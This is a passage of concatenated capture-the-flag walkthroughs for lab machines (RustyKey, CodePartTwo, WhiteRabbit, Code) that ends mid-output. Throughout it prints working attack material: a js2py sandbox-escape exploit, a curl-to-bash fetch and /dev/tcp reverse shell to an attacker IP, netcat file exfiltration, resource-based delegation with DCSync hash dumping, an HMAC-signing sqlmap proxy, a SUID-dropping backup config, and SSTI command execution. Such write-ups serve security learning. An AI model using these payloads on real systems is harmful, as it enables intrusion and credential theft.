curl 10.10.14.150/pwned.dll -o pwned.dll
PS C:\temp> Set-ItemProperty -Path "HKLM:\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\temp\pwned.dll"
Set-ItemProperty -Path "HKLM:\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\temp\pwned.dll"
PS C:\temp> 

Start listener:

1
2
rlwrap nc -lvnp 45345          
listening on [any] 45345 ...

After waiting for a bit we get a shell as mm.turner:

1
2
3
4
5
6
7
8
rlwrap nc -lvnp 45345          
listening on [any] 45345 ...
connect to [10.10.14.150] from (UNKNOWN) [10.10.11.75] 54484

PS C:\Windows> 
PS C:\Windows> whoami
rustykey\mm.turner
PS C:\Windows> 

JACKPOT

mm.turner is a member of the DELEGATION group yeah that’s right DELEGATION that means RBCD.

mm.turner is member of the DELEGATION group which has powerful privileges

Let’s do the attack path now:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\Windows> Get-ADComputer DC -Properties PrincipalsAllowedToDelegateToAccount

DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName                          : dc.rustykey.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {}
SamAccountName                       : DC$
SID                                  : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName                    :

PS C:\Windows>

The current PrincipalsAllowedToDelegateToAccount is empty, so none of the users can impersonate others. Let’s add IT-COMPUTER3$ to this list and get a service ticket:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\Windows> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount "IT-COMPUTER3$"
PS C:\Windows> Get-ADComputer DC -Properties PrincipalsAllowedToDelegateToAccount

DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName                          : dc.rustykey.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName                    :

PS C:\Windows>

Nice! Now IT-COMPUTER3$ is in place and we can execute the S4U attack.

We can use the backupadmin user to dump the hashes using its ticket:

1
2
3
4
5
6
7
8
9
getST.py -spn 'cifs/dc.rustykey.htb' -impersonate 'backupadmin' 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'  
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_dc.rustykey.htb@RUSTYKEY.HTB.ccache

1
export KRB5CCNAME=backupadmin@cifs_dc.rustykey.htb@RUSTYKEY.HTB.ccache

Dumping the hashes using secretsdump:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip 10.10.11.75 rustykey.htb/backupadmin@dc.rustykey.htb
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM
 0000   6A 34 14 2E FC 1A C2 54  64 E3 4C F1 A7 13 5F 34   j4.....Td.L..._4
 0010   79 98 16 81 90 47 A1 F0  8B FC 47 78 8C 7B 76 B6   y....G....Gx.{v.
 0020   C0 E4 94 9D 1E 15 A6 A9  70 2C 13 66 D7 23 A1 0B   ........p,.f.#..
 0030   F1 11 79 34 C1 8F 00 15  7B DF 6F C7 C3 B4 FC FE   ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

We even get the password from this which is Rustyrc4key#!

Successfully dumped Administrator credentials via DCSync

And now using these credentials we can login to the administrator user using the credentials we got:

1
2
3
4
getTGT.py 'rustykey.htb/Administrator@rustykey.htb:Rustyrc4key#!'                     
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Administrator@rustykey.htb.ccache

1
export KRB5CCNAME=Administrator@rustykey.htb.ccache 

1
2
3
4
5
6
7
8
9
10
11
12
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
rustykey\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Rooted! The user part was relatively straightforward, but the root escalation was quite challenging. Happy Hacking Everyone <3

Happy Hacking! 🚀

Reconnaissance

Nmap Scan

Let’s start with a quick Nmap scan to see what’s open:

1
nmap -sCV -T5 --min-rate 2000 -v -oN codeparttwo.nmap -Pn 10.10.11.82

Scan Results:

1
2
3
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
8000/tcp open  http    Gunicorn 20.0.4

Key Findings

• SSH (Port 22): OpenSSH 8.2p1 running on Ubuntu
• HTTP (Port 8000): Gunicorn 20.0.4 hosting a web app
• Web Title: Welcome to CodePartTwo

So we have a web server on port 8000. That Gunicorn banner tells us it’s probably a Python app. Let’s check it out.

Web Application Analysis

Heading over to http://10.10.11.82:8000, we see a landing page with a “Download App” button.

The main dashboard after logging in

When we click the download button, it gives us a app.zip file. Let’s see what’s inside:

1
unzip app.zip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
   creating: app/
   creating: app/static/
   creating: app/static/css/
  inflating: app/static/css/styles.css
   creating: app/static/js/
  inflating: app/static/js/script.js
  inflating: app/app.py
   creating: app/templates/
  inflating: app/templates/dashboard.html
  inflating: app/templates/reviews.html
  inflating: app/templates/index.html
  inflating: app/templates/base.html
  inflating: app/templates/register.html
  inflating: app/templates/login.html
  inflating: app/requirements.txt
   creating: app/instance/
  inflating: app/instance/users.db

Nice! We got the source code. I created an account using the register function and logged in. The dashboard has something interesting - a JavaScript code editor.

JavaScript code editor in the dashboard

Now let’s dig into that source code.

Source Code Analysis

Looking at app.py, I spotted something interesting right away - there’s a module called js2py being imported:

1
2
3
4
5
6
from flask import Flask, render_template, request, redirect, url_for, session, jsonify, send_from_directory
from flask_sqlalchemy import SQLAlchemy
import hashlib
import js2py
import os
import json

And here’s where the magic happens - the /run_code endpoint:

1
2
3
4
5
6
7
8
@app.route('/run_code', methods=['POST'])
def run_code():
    try:
        code = request.json.get('code')
        result = js2py.eval_js(code)
        return jsonify({'result': result})
    except Exception as e:
        return jsonify({'error': str(e)})

It’s running user-supplied JavaScript code using js2py.eval_js(). That’s a big red flag.

Initial Access

CVE-2024-28397 - js2py Sandbox Escape

After some googling, I found that js2py has a nasty vulnerability - CVE-2024-28397. It’s a sandbox escape bug in js2py (versions 0.74 and below) that lets you break out of the JavaScript sandbox and execute Python code.

Here’s the deal: js2py maps JavaScript objects to Python objects so JS scripts can interact with Python. But if you can access Python objects from JS, you can reach system APIs like subprocess or os and run shell commands.

I found a PoC on GitHub: CVE-2024-28397-js2py-Sandbox-Escape

Testing the RCE

Let’s test if we can get code execution. I’ll try to make the server call back to my machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
let cmd = "curl 10.10.16.75:8000/pwnedcake_is_here"
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11

Set up a listener:

1
python3 -m http.server 8000

After clicking “Run Code”:

1
10.10.11.82 - - [04/Nov/2025 23:07:57] "GET /pwnedcake_is_here HTTP/1.1" 404 -

We got a callback! RCE confirmed.

Getting a Reverse Shell

Now let’s get a proper shell. I created a rev.sh file:

1
bash -i >& /dev/tcp/10.10.16.75/56234 0>&1

Set up my listener and modified the payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
let cmd = 'curl 10.10.16.75:8000/rev.sh | bash'
let hacked, bymarve, n11
let getattr, obj

hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__

function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}

n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11

And we’re in:

1
2
app@codeparttwo:~/app$ whoami
app

Privilege Escalation #1 - App to Marco

Since this is a Flask app, there’s usually an instance folder with some data. Let’s check it out:

1
2
3
4
5
6
7
8
9
10
app@codeparttwo:~/app$ ls -la
total 32
drwxrwxr-x 6 app app 4096 Sep  1 13:19 .
drwxr-x--- 6 app app 4096 Nov  4 15:36 ..
-rw-r--r-- 1 app app 3679 Sep  1 13:19 app.py
drwxrwxr-x 2 app app 4096 Nov  4 17:00 instance
...

app@codeparttwo:~/app/instance$ ls
users.db

There’s a SQLite database. Let’s grab it:

1
2
3
4
5
# On target
nc 10.10.16.75 8956 < users.db

# On attacker
nc -lvnp 8956 > users.db

Let’s see what’s in there:

1
sqlite3 users.db

1
2
3
4
5
6
sqlite> .tables
code_snippet  user
sqlite> select * from user;
1|marco|649c9d65a206a75---------------
2|app|a97588c0e2fa3a024876339e27aeb42e
3|pwnedcake|5f4dcc3b5aa765d61d8327deb882cf99

We got a hash for the user marco. Let’s check if that user exists on the system:

1
2
3
4
app@codeparttwo:~$ ls -l /home
total 8
drwxr-x--- 6 app   app   4096 Nov  4 15:36 app
drwxr-x--- 6 marco marco 4096 Nov  4 17:30 marco

Yep, marco is a real user. Let’s crack that hash.

Cracking the Hash

Using hashcat to crack the MD5 hash:

Successfully cracked marco’s password

Now we can SSH in as marco:

1
ssh marco@10.10.11.82

1
2
marco@codeparttwo:~$ whoami
marco

User Flag Captured!

Privilege Escalation #2 - Marco to Root

Let’s check what sudo permissions marco has:

1
2
3
marco@codeparttwo:~$ sudo -l
User marco may run the following commands on codeparttwo:
    (root) NOPASSWD: /usr/local/bin/npbackup-cli

Interesting! We can run npbackup-cli as root without a password. Let’s see what files we have:

1
2
3
4
5
marco@codeparttwo:~$ ls -l
total 12
drwx------ 7 root  root  4096 Apr  6  2025 backups
-rw-rw-r-- 1 marco marco 2893 Nov  4 09:43 npbackup.conf
-rw-r----- 1 root  marco   33 Nov  3 19:33 user.txt

There’s a config file we can write to. Looking into npbackup-cli, it supports:

• Custom config via -c flag
• post_exec_commands in backup options (runs commands after backup)
• Custom paths to backup

This is perfect for abuse. We can make it:

1. Backup /root
2. Run arbitrary commands as root after the backup

Crafting a Malicious Config

Let’s create a config that drops a SUID bash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cat > /tmp/pwned.conf << 'EOF'
conf_version: 3.0.1
audience: public
repos:
  default:
    repo_uri: __NPBACKUP__wd9051w9Y0p4ZYWmIxMqKHP81/phMlzIOYsL01M9Z7IxNzQzOTEwMDcxLjM5NjQ0Mg8PDw8PDw8PDw8PDw8PD6yVSCEXjl8/9rIqYrh8kIRhlKm4UPcem5kIIFPhSpDU+e+E__NPBACKUP__
    repo_group: default_group
    backup_opts:
      paths:
        - /root
      source_type: folder_list
      post_exec_commands:
        - "mkdir -p /tmp/cake"
        - "cp /bin/bash /tmp/cake/cakebash"
        - "chmod u+s /tmp/cake/cakebash"
    repo_opts:
      repo_password: __NPBACKUP__v2zdDN21b0c7TSeUZlwezkPj3n8wlR9Cu1IJSMrSctoxNzQzOTEwMDcxLjM5NjcyNQ8PDw8PDw8PDw8PDw8PD0z8n8DrGuJ3ZVWJwhBl0GHtbaQ8lL3fB0M=__NPBACKUP__
EOF

Running the Exploit

1
sudo /usr/local/bin/npbackup-cli -c /tmp/pwned.conf run default --force

This backs up /root and then runs our post_exec_commands as root, which creates a SUID bash at /tmp/cake/cakebash.

Getting Root

1
2
3
4
5
6
marco@codeparttwo:/tmp$ cd cake
marco@codeparttwo:/tmp/cake$ ./cakebash -p
cakebash-5.0# whoami
root
cakebash-5.0# cat /root/root.txt
<redacted>

Root Flag Captured!

Key Takeaways

Vulnerabilities Exploited

1. CVE-2024-28397 (js2py Sandbox Escape)
   • Allowed breaking out of the JavaScript sandbox
   • Enabled arbitrary command execution on the server
2. Insecure Backup Tool Configuration
   • npbackup-cli allowed custom configs
   • post_exec_commands ran as root without validation
3. Weak Password Hashing
   • MD5 hashes in the database were easily cracked

Lessons Learned

Never use js2py.eval_js() with untrusted input. If you need to run user JavaScript, use a proper sandboxed environment or a dedicated JS engine.

Tools that run as root should validate their config files and restrict dangerous options like command execution.

Tools Used

• Nmap - Port scanning and service detection
• js2py PoC - Sandbox escape exploit
• Hashcat - Password hash cracking
• Netcat - File transfer and reverse shells
• SQLite3 - Database enumeration

Conclusion

CodePartTwo was a fun box that showed how dangerous it can be to execute untrusted code, even in a “sandbox”. The js2py vulnerability gave us initial access, and the misconfigured backup tool with root permissions was the perfect escalation path.

Final Stats:

• Time to User: ~40 minutes
• Time to Root: ~20 minutes
• Difficulty Rating: Easy

Thanks for reading! Happy Hacking!

Reconnaissance

Nmap Scan

Starting with a quick Nmap scan:

1
nmap -sCV -T5 --min-rate 2000 -v -oN whiterabbit.nmap 10.129.75.14

Scan Results:

1
2
3
4
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9
80/tcp open  http    Caddy httpd
|_http-title: Did not follow redirect to http://whiterabbit.htb

Key Findings

• SSH (Port 22): OpenSSH 9.6p1 running on Ubuntu
• HTTP (Port 80): Caddy web server redirecting to whiterabbit.htb

Let’s add the domain to our hosts file and enumerate further.

Subdomain Enumeration

Using ffuf to find subdomains:

1
ffuf -H "Host: FUZZ.whiterabbit.htb" -c -ic -w /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://whiterabbit.htb -fs 0

1
status                  [Status: 302, Size: 32, Words: 4, Lines: 1]

Found status.whiterabbit.htb. After adding it to /etc/hosts, we can visit the page.

Uptime Kuma status monitoring page

I did some research on this and found an interesting GitHub issue about Uptime Kuma having a /status directory. Let’s fuzz for more paths:

1
ffuf -ic -c -u http://status.whiterabbit.htb/status/FUZZ -w /opt/SecLists/Discovery/Web-Content/common.txt -fs 2444

1
temp                    [Status: 200, Size: 3359]

Found /status/temp. Let’s check it out.

The temp status page showing multiple services

This revealed several internal services:

• GoPhish
• n8n
• Website
• WikiJS

After adding these to our hosts file and visiting the WikiJS endpoint, I found a webhook URL.

Webhook pointing to another subdomain

Following the redirect leads us to an n8n workflow page.

n8n automation workflow interface

SQL Injection via HMAC Proxy

While investigating, I found some interesting POST requests going to a database.

POST request communicating with a database

In the webhook configuration, I found a GoPhish phishing score database JSON file.

GoPhish configuration with sensitive data

And here’s the juicy part - an HMAC secret:

1
2
cat gophish_to_phishing_score_database.json | grep secret
        "secret": "3CWVGMndgMvdVAzOjqBiTicmv7gxc6

The HMAC Problem

Here’s the thing: the server uses HMAC signatures to validate requests. All requests must be signed with the secret key, otherwise they get rejected. This means we can’t just fire up SQLMap directly because our payloads won’t be signed.

To solve this, I wrote a Python proxy that intercepts requests, signs them with the HMAC value, and forwards them to the target server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python3
"""
HMAC Proxy for GoPhish SQLMap automation
"""

import hashlib
import hmac
import json
from http.server import HTTPServer, BaseHTTPRequestHandler
import urllib.request
import urllib.parse
import sys

class HMACProxyHandler(BaseHTTPRequestHandler):
    SECRET_KEY = "3CWVGMndgMvdVAzOjqBiTicmv7gxc6IS"
    TARGET_HOST = "28efa8f7df.whiterabbit.htb"

    def do_POST(self):
        content_length = int(self.headers.get('Content-Length', 0))
        post_data = self.rfile.read(content_length)

        # Generate HMAC signature
        signature = hmac.new(
            self.SECRET_KEY.encode('utf-8'),
            post_data,
            digestmod=hashlib.sha256
        ).hexdigest()

        headers = {
            'Content-Type': self.headers.get('Content-Type', 'application/json'),
            'x-gophish-signature': f'sha256={signature}',
            'User-Agent': self.headers.get('User-Agent', 'sqlmap'),
        }

        try:
            target_url = f"http://{self.TARGET_HOST}{self.path}"
            req = urllib.request.Request(
                target_url,
                data=post_data,
                headers=headers,
                method='POST'
            )

            with urllib.request.urlopen(req) as response:
                response_data = response.read()
                self.send_response(response.getcode())
                for header, value in dict(response.headers).items():
                    if header.lower() not in ['connection', 'transfer-encoding']:
                        self.send_header(header, value)
                self.end_headers()
                self.wfile.write(response_data)

        except Exception as e:
            self.send_error(500, str(e))

def run_proxy(port=8888):
    server = HTTPServer(('127.0.0.1', port), HMACProxyHandler)
    print(f"HMAC Proxy running on port {port}")
    server.serve_forever()

if __name__ == "__main__":
    run_proxy()

Initial Access

Exploiting SQL Injection

With the proxy running, we can now use SQLMap:

HMAC proxy ready to sign our requests

1
2
3
4
sqlmap -u "http://127.0.0.1:8888/webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d" \
  --method POST \
  --data '{"campaign_id":2,"email":"test@mail.com","message":"Clicked Link"}' \
  -p email --batch --dump --level=5 --risk=3 --dbs

Found three databases

We found three databases: information_schema, phishing, and temp. Let’s dump the temp database:

1
2
3
4
sqlmap -u "http://127.0.0.1:8888/webhook/d96af3a4-21bd-4bcb-bd34-37bfc67dfd1d" \
  --method POST \
  --data '{"campaign_id":2,"email":"test@mail.com","message":"Clicked Link"}' \
  -p email --batch --dump --level=5 --risk=3 -D temp

Command log from the temp database

This gave us a command_log with some interesting entries:

1
2
3
4
5
6
7
8
9
10
+----+---------------------+------------------------------------------------------------------------------+
| id | date                | command                                                                      |
+----+---------------------+------------------------------------------------------------------------------+
| 1  | 2024-08-30 10:44:01 | uname -a                                                                     |
| 2  | 2024-08-30 11:58:05 | restic init --repo rest:http://75951e6ff.whiterabbit.htb                     |
| 3  | 2024-08-30 11:58:36 | echo ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw > .restic_passwd                       |
| 4  | 2024-08-30 11:59:02 | rm -rf .bash_history                                                         |
| 5  | 2024-08-30 11:59:47 | #thatwasclose                                                                |
| 6  | 2024-08-30 14:40:42 | cd /home/neo/ && /opt/neo-password-generator/neo-password-generator | passwd |
+----+---------------------+------------------------------------------------------------------------------+

This is gold! We have a Restic password and a URL.

Restic Backup Enumeration

Let’s access the Restic snapshots:

1
2
export RESTIC_PASSWORD=ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw
restic -r rest:http://75951e6ff.whiterabbit.htb snapshots

Found Bob’s SSH folder in a snapshot

We can restore Bob’s SSH folder:

1
restic restore 272cacd5 --target . --path /dev/shm/bob/ssh -r rest:http://75951e6ff.whiterabbit.htb

Inside we find a password-protected 7z file. Let’s crack it:

1
2
7z2john bob.7z > bob.hash
hashcat bob.hash /usr/share/wordlists/rockyou.txt -m 11600 --user

1
$7z$...:1q2w3e4r5t6y

After extracting with the password 1q2w3e4r5t6y, we get Bob’s SSH private key and config:

1
2
3
4
Host whiterabbit
  HostName whiterabbit.htb
  Port 2222
  User bob

Port 2222 is running SSH. Let’s connect:

1
ssh bob@whiterabbit.htb -p 2222 -i id_rsa_bob

We’re in as bob, but we’re in a Docker container.

Privilege Escalation

Restic Abuse

Checking sudo permissions:

1
2
3
bob@ebdce80611e9:~$ sudo -l
User bob may run the following commands on ebdce80611e9:
    (ALL) NOPASSWD: /usr/bin/restic

We can run restic as root. Let’s abuse this to backup and extract root’s files:

1
2
3
4
5
6
7
8
9
10
11
# Create a local repo
sudo /usr/bin/restic init -r .

# Backup /root
sudo /usr/bin/restic -r . backup /root/

# List the backup
sudo /usr/bin/restic -r . ls latest

# Dump morpheus SSH key
sudo restic -r . dump latest /root/morpheus

This gives us Morpheus’s SSH private key. Now we can SSH to the main host as morpheus.

Reverse Engineering the Password Generator

Remember the command log entry about neo-password-generator? Let’s download and reverse engineer it.

After analyzing it in Ghidra, the binary:

1. Uses gettimeofday to get a timestamp in milliseconds
2. Seeds the C rand() function with this value
3. Generates a 20-character password from the charset a-zA-Z0-9

From the log, we know neo ran it on 2024-08-30 14:40:42 UTC. I wrote a C script to generate all possible passwords:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

void generate_password(unsigned int seed) {
    const char *charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    char password[21];
    srand(seed);
    for (int i = 0; i < 20; i++) {
        password[i] = charset[rand() % 62];
    }
    password[20] = '\0';
    printf("Seed: %u, Password: %s\n", seed, password);
}

int main() {
    unsigned long long base_seed = 1725028842ULL * 1000;
    for (int microseconds = 0; microseconds < 1000; microseconds++) {
        unsigned int seed = (unsigned int)(base_seed + microseconds);
        generate_password(seed);
    }
    return 0;
}

After generating the wordlist, we brute-force:

1
hydra -l neo -P passwords_only.txt ssh://whiterabbit.htb -t 5

1
[22][ssh] host: whiterabbit.htb   login: neo   password: WBSxhWgfnMiclrV4dqfj

Root Access

Let’s check neo’s privileges:

1
2
3
4
5
6
7
neo@whiterabbit:~$ sudo -l
User neo may run the following commands on whiterabbit:
    (ALL : ALL) ALL

neo@whiterabbit:~$ sudo su
root@whiterabbit:/home/neo# whoami
root

Root Flag Captured!

Key Takeaways

Vulnerabilities Exploited

1. HMAC-Signed SQL Injection
   • Bypassed HMAC validation using a custom proxy
   • Extracted sensitive data from the database
2. Restic Backup Abuse
   • Used sudo permissions to backup and extract root files
   • Retrieved SSH keys from backup snapshots
3. Weak Password Generation
   • Predictable seed (timestamp-based)
   • Allowed brute-forcing the password space

Lessons Learned

Timestamp-based seeding for cryptographic operations is weak. Use proper entropy sources like /dev/urandom.

HMAC validation doesn’t help if the secret is exposed. Keep secrets out of configuration files that may be accessible.

Tools Used

• Nmap - Port scanning
• ffuf - Subdomain and directory fuzzing
• SQLMap - SQL injection exploitation
• Hashcat - Password cracking
• Restic - Backup enumeration
• Ghidra - Binary reverse engineering
• Hydra - SSH brute-forcing

Conclusion

WhiteRabbit was an amazing machine that required creative thinking at every step. The HMAC proxy for SQLi was a fun problem to solve, and the password generator reverse engineering was a nice touch. The Docker escape through Restic abuse showed how backup tools with elevated privileges can be dangerous.

Final Stats:

• Time to User: ~3 hours
• Time to Root: ~1 hour
• Difficulty Rating: Insane

Thanks for reading! Happy Hacking!

Reconnaissance

Nmap Scan

Starting with a comprehensive Nmap scan to identify open ports and running services:

1
nmap -sCV -T5 --min-rate 2000 -v -oN code.nmap -Pn 10.10.11.62

Scan Results:

1
2
3
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12
5000/tcp open  http    Gunicorn 20.0.4

Key Findings

• SSH (Port 22): OpenSSH 8.2p1 running on Ubuntu
• HTTP (Port 5000): Gunicorn 20.0.4 hosting a Python web application
• Web Title: Python Code Editor

Initial Access

Web Application Analysis

Navigating to http://10.10.11.62:5000 reveals a Python code editor interface. This immediately suggests the application might be processing user-submitted Python code on the server side.

Python code editor running on port 5000

Server-Side Template Injection (SSTI)

While testing the application, I discovered it was using Jinja2’s render_template_string() to process user input, indicating a potential SSTI vulnerability.

Confirming SSTI

Testing with a basic mathematical expression:

1
print(render_template_string(""))

Result: 42 ✅

This confirms that Jinja2 template rendering is being executed server-side.

Enumerating the Environment

Global Variables Enumeration

1
print(globals())

This revealed several interesting objects, including a reference to a database.db file and various Flask application objects.

Interesting findings in global variables

Local Variables Enumeration

1
print(locals())

After analyzing the local scope, I discovered we had access to database models, including a User model.

Database Extraction

Using SQLAlchemy’s ORM capabilities through the SSTI vulnerability:

1
print([(user.id, user.username, user.password) for user in User.query.all()])

Output:

1
2
[(1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99'), 
 (2, 'martin', '8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918')]

Password Cracking

Using CrackStation to crack the MD5 hash:

Successfully cracked martin’s password hash

Credentials Found:

1
martin:nafeelswordsmaster

User Flag

Before pivoting, we can extract the user flag directly through SSTI using Python’s subprocess module:

1
print(''.__class__.__base__.__subclasses__()[317]('cat /home/app-production/user.txt', shell=True, stdout=-1).communicate())

User Flag Captured! ✅

Privilege Escalation

SSH Access

With valid credentials, we can now SSH into the machine:

1
ssh martin@10.10.11.62

Sudo Privileges Enumeration

1
martin@code:~$ sudo -l

Output:

1
2
User martin may run the following commands on localhost:
    (ALL : ALL) NOPASSWD: /usr/bin/backy.sh

Martin can execute /usr/bin/backy.sh as root without a password!

Analyzing the Backup Script

Examining the /usr/bin/backy.sh script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/bin/bash
if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi

allowed_paths=("/var/" "/home/")
updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")
/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}

for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done

/usr/bin/backy "$json_file"

Understanding the Vulnerability

The script has a critical flaw in its path validation logic:

1. It only checks if paths start with /var/ or /home/
2. The jq filter removes ../ sequences, but only after the path validation
3. We can use path traversal to bypass restrictions

Exploitation Strategy

Initial failed attempts:

1
2
3
4
{
    "destination": "/home/martin/backups/",
    "directories_to_archive": ["/root/.ssh/"]
}

Error: /root/.ssh/ is not allowed ❌

1
2
3
4
{
    "destination": "/home/martin/backups/",
    "directories_to_archive": ["/var/../../../../../../root/.ssh/"]
}

Error: Still blocked after jq processing ❌

Successful Bypass

The key insight: start with an allowed path, then traverse before the security check evaluates the final path:

1
2
3
4
5
6
7
8
{
  "destination": "/home/martin/",
  "multiprocessing": true,
  "verbose_log": true,
  "directories_to_archive": [
    "/var/../root/"
  ]
}

Executing the Exploit

1
martin@code:~/backups$ sudo /usr/bin/backy.sh taskss.json

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
